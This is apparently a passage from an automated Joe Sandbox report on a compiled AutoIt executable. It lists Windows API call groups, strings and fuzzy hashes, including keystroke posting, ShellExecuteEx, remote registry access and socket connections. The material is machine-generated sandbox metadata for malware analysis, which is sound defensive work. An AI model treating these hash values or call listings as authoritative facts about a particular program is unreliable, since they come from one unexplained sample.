                    • IsWindowEnabled.USER32(00882760), ref: 00CFB6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CFB795
                    • SendMessageW.USER32(00882760,000000B0,?,?), ref: 00CFB7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 00CFB809
                    • GetWindowLongW.USER32(00882760,000000EC), ref: 00CFB82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CFB843
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: 8bed8411cd0b603b1e0361631db1d5ab402be5ff028c71c40a30e43cf5befc02
                    • Instruction ID: 5f4ccc3a8d4838e32042bdcdd5792b4b5349244a0082c94ce83a4005ffa2890c
                    • Instruction Fuzzy Hash: C371C374604208AFDB64AF64C894FBA7BB9FF49300F14405AFA65D73A1C731AE41DB62
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • CoInitialize.OLE32 ref: 00CE8718
                    • VariantInit.OLEAUT32(?), ref: 00CE8890
                    • VariantClear.OLEAUT32(?), ref: 00CE88F1
                    Strings
                    Similarity
                    • API ID: Variant$ClearInitInitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 4106155388-1287834457
                    • Opcode ID: 39d8f2e37f66fd92fdbc5ef94577bd4b1934607c20ba3fd25126db6a9e1dab3f
                    • Instruction ID: 502fb6b3f0e0c4697818e2c4b128875d6e0402251252fb2ef2dbd0d1853b9ed7
                    • Instruction Fuzzy Hash: 3361AE706083519FD720DF26C849B6EBBE8EF49714F10481DF9999B291CB70EE48DB92
                    APIs
                    • _memset.LIBCMT ref: 00CEF75C
                    • _memset.LIBCMT ref: 00CEF825
                    • ShellExecuteExW.SHELL32(?), ref: 00CEF86A
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 00CEF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 00CEF910
                    Strings
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: c0ca50b38e2416216dcf69656983bb5c6043fcc88067cda883e1232bddea0bfa
                    • Instruction ID: 667da19eca8a9f26665c1b1b8bb3569061099af512dd98074aa25253759a5c47
                    • Instruction Fuzzy Hash: C461A075A00659DFCF14DF55C485AAEBBF4FF48310B14846DE85AAB391CB30AE42DB90
                    APIs
                    • GetParent.USER32(?), ref: 00CD149C
                    • GetKeyboardState.USER32(?), ref: 00CD14B1
                    • SetKeyboardState.USER32(?), ref: 00CD1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CD1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CD155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CD15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CD15C8
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 1edf52afb037f703e68625a0114bd010dd948971f8939d1990d9352f26c060aa
                    • Instruction ID: 0aa73c463491237f88a12c9fe0515dd68e2b5d56a621fa0f22942202591754ee
                    • Instruction Fuzzy Hash: AD5114A06043D53DFB3646348C45BBABEE95B42304F0C848EFAE545AD2D298EE85D750
                    APIs
                    • GetParent.USER32(00000000), ref: 00CD12B5
                    • GetKeyboardState.USER32(?), ref: 00CD12CA
                    • SetKeyboardState.USER32(?), ref: 00CD132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CD1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CD1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CD13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CD13D9
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 9ad8e29ccb9c33719603f0a5052ab7db493bc896b33ded061089f30c5efe7299
                    • Instruction ID: 50b704ac651b53597520141407afe0635a210d1582711f60b2a2a18c0cf2fb11
                    • Instruction Fuzzy Hash: 455103A05047D57DFB3287248C45B7ABFA95F06300F0C848AEAE44AAD2D395EE94E751
                    APIs
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: 5804f9cdee503636adecddc7b5c68638e3f642cf75d5a40143691fd68409b169
                    • Instruction ID: 2bcfcd40fba2d24c05d4bbe66bb5a82ada915631ea1f7f3c3c7fa60e5cd84f6f
                    • Instruction Fuzzy Hash: 30416265C2052876CF11EBF4888AEDFB3A8AF05310F508557F618E3221E734E716D7AA
                    APIs
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD38D3,?), ref: 00CD48C7
                      • Part of subcall function 00CD48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD38D3,?), ref: 00CD48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 00CD38F3
                    • _wcscmp.LIBCMT ref: 00CD390F
                    • MoveFileW.KERNEL32(?,?), ref: 00CD3927
                    • _wcscat.LIBCMT ref: 00CD396F
                    • SHFileOperationW.SHELL32(?), ref: 00CD39DB
                    Strings
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: fd80213745a17c4436f21bf502c6ba9ca142d4997e8ec1a9bd0ab75dbc682c0d
                    • Instruction ID: 4f7ecdaf8df48ff10faed300a2a7e50f253cdf9aa3fac6350ae3053563df4592
                    • Instruction Fuzzy Hash: 38418DB15093849AC751EF64C895AEFB7E8AF88340F04092FB599C32A1EA74D748C753
                    APIs
                    • _memset.LIBCMT ref: 00CF7519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CF75C0
                    • IsMenu.USER32(?), ref: 00CF75D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CF7620
                    • DrawMenuBar.USER32 ref: 00CF7633
                    Strings
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 3edcb2d9a2e9aa69717291baef7a4bf0c80ff4494b3170b6b163040d4e6be8bf
                    • Instruction ID: 45c58c5e75e2770fef721a8fc37805511d57535b3b57f3f70b22606cdb218600
                    • Instruction Fuzzy Hash: 28411A75A04609AFDB50DF94D884EAABBB4FF08350F148129FA2597750D730AE50CFA1
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00CF125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF1286
                    • FreeLibrary.KERNEL32(00000000), ref: 00CF133D
                      • Part of subcall function 00CF122D: RegCloseKey.ADVAPI32(?), ref: 00CF12A3
                      • Part of subcall function 00CF122D: FreeLibrary.KERNEL32(?), ref: 00CF12F5
                      • Part of subcall function 00CF122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CF1318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CF12E0
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: f71cbf94ed75aee730b0c12bb73f1a48a71bf5878138b404940e74dfbb836aab
                    • Instruction ID: c4e1ed1cc9667c04b1200cf44c6148c36de4dd920f6a814e5479fe9e34c56e84
                    • Opcode Fuzzy Hash: f71cbf94ed75aee730b0c12bb73f1a48a71bf5878138b404940e74dfbb836aab
                    • Instruction Fuzzy Hash: 4B311AB190110DFFDB549B90DC89AFEB7BCEF08300F040169EA12E2151EA749F499AA5
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CF655B
                    • GetWindowLongW.USER32(00882760,000000F0), ref: 00CF658E
                    • GetWindowLongW.USER32(00882760,000000F0), ref: 00CF65C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CF65F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CF661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CF6630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CF664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 9a6877d8972ef488913dda0c3062d21e83770223ef6ab51a1f8669378c827346
                    • Instruction ID: a8026acca2ba70364d1d24e2d1e938e984f6fc028c7a285608bf1dc97a3fdcf3
                    • Opcode Fuzzy Hash: 9a6877d8972ef488913dda0c3062d21e83770223ef6ab51a1f8669378c827346
                    • Instruction Fuzzy Hash: F9310131604218AFDB618F18DC84F693BE1FB4A750F1941A8F621DB2B6CB71ED40DB62
                    APIs
                      • Part of subcall function 00CE80A0: inet_addr.WS2_32(00000000), ref: 00CE80CB
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00CE64D9
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE64E8
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00CE6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 00CE652A
                    • WSAGetLastError.WS2_32 ref: 00CE6534
                    • closesocket.WS2_32(00000000), ref: 00CE655D
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00CE6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 2687a52560abf1b8fb2a43861a61784462c639408e91daa44e0c1aaf7eb9cdb0
                    • Instruction ID: 4c59ba00f09484dfdb5c20fa0bf31d3ca09e968ed05d7b0a8e864afe3a0931f6
                    • Opcode Fuzzy Hash: 2687a52560abf1b8fb2a43861a61784462c639408e91daa44e0c1aaf7eb9cdb0
                    • Instruction Fuzzy Hash: 7731D131610218AFDB10AF25CC85BBE7BB8EF553A4F008029F909972D1CB74AD05DBA2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: 8de05f725ab6eaae36ff2a85ed7bac11ebcbbe7a1353500b4443d950fafe71e1
                    • Instruction ID: b6332193de0a8d95313236e3d776b5051653521ff444e1ee8a3b57e68485b8bd
                    • Opcode Fuzzy Hash: 8de05f725ab6eaae36ff2a85ed7bac11ebcbbe7a1353500b4443d950fafe71e1
                    • Instruction Fuzzy Hash: 91213732204155ABD630A725DC26FBB73E9EF51340F54803EF89986181EB52AF83E2A5
                    APIs
                      • Part of subcall function 00C71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C71D73
                      • Part of subcall function 00C71D35: GetStockObject.GDI32(00000011), ref: 00C71D87
                      • Part of subcall function 00C71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C71D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CF78A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CF78AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CF78B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CF78C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CF78D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 947ac3980adceae3501616f31ffdc62a88a8be48fd93b640ada4b450758947ae
                    • Instruction ID: 2e7de4846ddf648eaab3c84969b66f98fd48447ac926dd45058fb321a87f6a61
                    • Opcode Fuzzy Hash: 947ac3980adceae3501616f31ffdc62a88a8be48fd93b640ada4b450758947ae
                    • Instruction Fuzzy Hash: 8C1151B155021DBEEF159F64CC85EE77F6DEF08798F014115BB14A6090C7719C21DBA4
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00C941E3
                    • GetProcAddress.KERNEL32(00000000), ref: 00C941EA
                    • RtlEncodePointer.NTDLL(00000000), ref: 00C941F6
                    • RtlDecodePointer.NTDLL(00000001), ref: 00C94213
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: 44de48561748457df6a5e2050ad9792980046c901a4219579c5e37395122a814
                    • Instruction ID: 590a1353689186933da3bb32291b693387eba0135c777af56ea6ba201535adb0
                    • Opcode Fuzzy Hash: 44de48561748457df6a5e2050ad9792980046c901a4219579c5e37395122a814
                    • Instruction Fuzzy Hash: 8DE0EDB09917409EDF105B70EC4DB3836A4FB11702F104428B421D51F0D7F95496CA21
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C941B8), ref: 00C942B8
                    • GetProcAddress.KERNEL32(00000000), ref: 00C942BF
                    • RtlEncodePointer.NTDLL(00000000), ref: 00C942CA
                    • RtlDecodePointer.NTDLL(00C941B8), ref: 00C942E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: 07a8fa067d8dfc7322c5ab443e9ea3433ed3f83c45f6a8451a5fb139da1d9fd8
                    • Instruction ID: 6027ad79e8ebafe14a73a0f0f9b4653bef6b89c48d146ffcb5198dc7862a2b05
                    • Opcode Fuzzy Hash: 07a8fa067d8dfc7322c5ab443e9ea3433ed3f83c45f6a8451a5fb139da1d9fd8
                    • Instruction Fuzzy Hash: B0E0B678591B01AFEB149B60EC0DF2A3AA4FB24742F144028F011E12B0CBB8598ADA35
                    APIs
                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00CE6F14
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE6F48
                    • htons.WS2_32(?), ref: 00CE6FFE
                    • inet_ntoa.WS2_32(?), ref: 00CE6FBB
                      • Part of subcall function 00CCAE14: _strlen.LIBCMT ref: 00CCAE1E
                      • Part of subcall function 00CCAE14: _memmove.LIBCMT ref: 00CCAE40
                    • _strlen.LIBCMT ref: 00CE7058
                    • _memmove.LIBCMT ref: 00CE70C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    • Opcode ID: 8ff75dcdd4b27ddcba804e9bbd952bd2628c0bf18d92fd8d2575fe9bb79406b4
                    • Instruction ID: d6984f9b171750b68f7e438a48bb0ff9509f4cd485356a13439c8216376ecf56
                    • Opcode Fuzzy Hash: 8ff75dcdd4b27ddcba804e9bbd952bd2628c0bf18d92fd8d2575fe9bb79406b4
                    • Instruction Fuzzy Hash: 8981D131504340ABC710EB25CC85F6FB7A9EF84724F148A1DF65A9B2E2DB709E05DB92
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: 0c075802fe2ce86c2298120689fc474de85c87cf01fda3a22c071ebc9f61edda
                    • Instruction ID: d98127c628d924e819527788c007d7632d26477155070a8c6da78b9bc78870cd
                    • Opcode Fuzzy Hash: 0c075802fe2ce86c2298120689fc474de85c87cf01fda3a22c071ebc9f61edda
                    • Instruction Fuzzy Hash: 2961DF3050065A9BDF11EF60CC86EFE3BA5EF44308F04855AFE5A5B292DB31AD01EB50
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF0548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CF0588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CF05AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CF05D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CF0617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00CF0624
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: fc101c4976018f6c507754a5b4362dbb52351a47782539f42c5be496589d4189
                    • Instruction ID: 429704289565a3fe62ff1ca79631690b69769f74fc74040f124f6bf8767f55cd
                    • Opcode Fuzzy Hash: fc101c4976018f6c507754a5b4362dbb52351a47782539f42c5be496589d4189
                    • Instruction Fuzzy Hash: 41515A31108204AFCB14EB54C885E7EBBE8FF84714F14892DFA55872A2DB71EA05EB52
                    APIs
                    • GetMenu.USER32(?), ref: 00CF5A82
                    • GetMenuItemCount.USER32(00000000), ref: 00CF5AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CF5AE1
                    • GetMenuItemID.USER32(?,?), ref: 00CF5B50
                    • GetSubMenu.USER32(?,?), ref: 00CF5B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CF5BAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 4e2c6527a350c998e97cf65e071a3b1ef32dab1378dbb7981d757b0f77156140
                    • Instruction ID: 293adfbc78a13004a1a0d4d5c351dd0a72a049789a9131a101352e7e7cf26182
                    • Opcode Fuzzy Hash: 4e2c6527a350c998e97cf65e071a3b1ef32dab1378dbb7981d757b0f77156140
                    • Instruction Fuzzy Hash: 3B517F75A00619AFDF11EF64C845ABEBBB4EF48320F10446AEB15B7351CB70AE41DB92
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00CCF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 00CCF469
                    • VariantClear.OLEAUT32(00000000), ref: 00CCF4C4
                    • _memmove.LIBCMT ref: 00CCF4EE
                    • VariantClear.OLEAUT32(?), ref: 00CCF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00CCF569
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: cda5722b8ab83a0190a093f1bad067f35e19558f041376fb42e2dda32c3841c0
                    • Instruction ID: b8d9768cc27882ff733b9c71818f3b58693927a736b4445f8bddabed8bd2aef8
                    • Opcode Fuzzy Hash: cda5722b8ab83a0190a093f1bad067f35e19558f041376fb42e2dda32c3841c0
                    • Instruction Fuzzy Hash: E4515BB5A002099FCB14CF58D884EAAB7B9FF48314B15856DE959DB300D730E952CBA0
                    APIs
                    • _memset.LIBCMT ref: 00CD2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD2792
                    • IsMenu.USER32(00000000), ref: 00CD27B2
                    • CreatePopupMenu.USER32 ref: 00CD27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 00CD2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CD2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
